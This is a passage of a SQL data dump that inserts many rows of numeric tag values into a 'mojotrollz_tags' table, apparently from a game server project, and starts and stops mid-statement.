`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3691, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3691, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3692, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3692, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3693, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3693, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3694, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3695, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3695, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3696, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3698, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3700, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3700, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3701, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3702, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3702, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3703, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3703, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3704, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3704, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3705, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3705, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3706, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3706, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3706, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3706, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3706, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3707, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3707, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3708, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3708, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3711, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3711, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3712, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3712, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3713, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3713, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3715, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3715, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3717, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3717, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3721, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3722, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3725, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3725, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3727, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3728, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3728, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3730, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3730, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3732, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3733, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3733, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3734, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3734, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3735, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3735, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3736, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3737, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3739, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3740, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3740, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3742, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3742, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3743, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3743, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3745, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3745, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3746, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3746, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3748, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3748, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3749, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3749, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3750, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3750, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3752, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3752, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3754, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3754, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3755, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3755, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3757, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3757, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3758, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3758, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3759, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3759, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3762, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3762, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3763, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3763, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3765, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3765, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3767, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3767, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3770, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3770, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3771, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3771, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3772, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3772, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3773, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3773, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3774, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3774, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3779, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3780, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3781, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3782, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3782, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3783, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3784, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3789, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3791, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3792, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3792, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3797, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3797, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3799, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3801, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3801, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3802, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3802, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3803, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3803, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3804, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3804, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3806, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3806, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3807, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3807, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3808, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3808, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3809, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3809, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3810, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3810, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3811, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3811, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3812, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3812, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3814, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3814, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3815, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3815, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3816, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3817, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3817, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3818, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3818, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3819, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3819, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3820, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3820, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3821, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3821, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3823, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3823, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3824, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3824, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3825, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3825, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3833, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3833, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3834, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3834, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3835, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3835, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3835, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3836, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3836, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3837, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3838, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3838, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3840, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3840, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3840, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3841, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3841, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3842, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3842, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3843, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3844, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3845, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3845, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3846, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3846, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3847, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3847, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3848, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3848, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3849, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3849, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3849, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3850, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3850, 1, 2, 236, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3850, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3851, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3851, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3851, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3853, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3853, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3853, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3854, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3854, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3854, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3855, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3855, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3855, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3857, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3857, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3857, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3859, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3859, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3859, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3861, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3861, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3861, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 